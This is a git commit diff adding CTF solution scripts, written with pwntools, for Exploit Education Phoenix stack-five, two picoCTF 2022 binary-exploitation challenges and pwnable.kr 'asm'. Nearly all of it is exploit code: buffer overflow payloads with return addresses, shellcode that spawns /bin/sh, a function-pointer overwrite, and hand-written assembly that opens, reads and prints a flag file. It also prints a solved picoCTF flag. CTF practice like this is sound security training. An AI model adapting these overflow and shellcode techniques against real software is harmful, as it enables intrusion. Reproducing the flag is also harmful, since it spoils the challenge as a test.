more sols (finish picoctf 2022 pwn, pwnable.kr asm sol)

programmeruser2 · programmeruser2 · commit ad384a889023 · 2023-04-11T20:20:23.000-04:00
diff --git a/exploit-education/phoenix/stack-five.py b/exploit-education/phoenix/stack-five.py
@@ -0,0 +1,17 @@
+from pwn import *
+# currently broken
+s = ssh(host='localhost',user='user',password='user',port=2222)
+r = s.process('/opt/phoenix/amd64/stack-five')
+context.arch = 'amd64'
+offset = 0x80
+#payload = b'\x90'*(offset)+asm(f'jmp $+{8+6}')+b'\x90'*6+p64(0x7fffffffe5e0)+asm(shellcraft.sh())
+shellcode = asm(shellcraft.sh())
+#shellcode = b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'
+#print(shellcode,len(shellcode))
+payload = b'\x90'*(offset+8-len(shellcode))+shellcode+p64(0x7fffffffe5e0)
+print(offset+8,len(shellcode))
+s.write('/tmp/payload',payload)
+print(payload)
+r.sendline(payload)
+r.interactive()
+
diff --git a/picoCTF/2022/function_overwrite.py b/picoCTF/2022/function_overwrite.py
@@ -0,0 +1,14 @@
+from pwn import *
+
+r = remote('saturn.picoctf.net', 56524)
+#r = process('/tmp/vuln')
+payload = b'\xff' * (1337 // 0xff)
+payload += bytes([1337 % 0xff])
+payload += b'\n'
+payload += str(int((0x0804c040 - 0x0804c080) / 4)).encode('ascii') 
+payload += b' '
+payload += str(0x080492fc - 0x08049436 + (0x08049465 - 0x08049436)).encode('ascii')
+payload += b'\n'
+print(payload)
+r.send(payload)
+r.interactive()
diff --git a/picoCTF/2022/stack_cache.py b/picoCTF/2022/stack_cache.py
@@ -0,0 +1,9 @@
+from pwn import *
+#r = process('/tmp/vuln')
+r = remote('saturn.picoctf.net', 55023)
+payload = b'a' * (0xa + 4) + p32(0x08049d90) + p32(0x08049e10)*8
+r.sendline(payload)
+r.interactive()
+# reassemble flag from leaked contents
+# flag: picoCTF{Cle4N_uP_M3m0rY_fb0696ee}
+
diff --git a/pwnable-kr/asm.py b/pwnable-kr/asm.py
@@ -1,7 +1,29 @@
 from pwn import *
-# currently broken
 flag_file = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'
-shellcode = asm(shellcraft.amd64.readfile(flag_file), arch='amd64')
+context.arch = 'amd64'
+shellcode = asm(f'''
+mov rax, 2
+lea rdi, [rip+filename]
+mov rsi, 0
+mov rdx, 0
+syscall
+
+mov rdi, rax
+
+sub rsp, 100
+mov rax, 0
+mov rsi, rsp
+mov rdx, 100
+syscall
+
+mov rax, 1
+mov rdi, 1
+mov rsi, rsp
+mov rdx, 100
+syscall
+
+filename: .asciz "{flag_file}"
+''')
 print(shellcode)
 s = ssh(host='pwnable.kr',port=2222,user='asm',password='guest')
 r = s.remote('localhost', 9026)
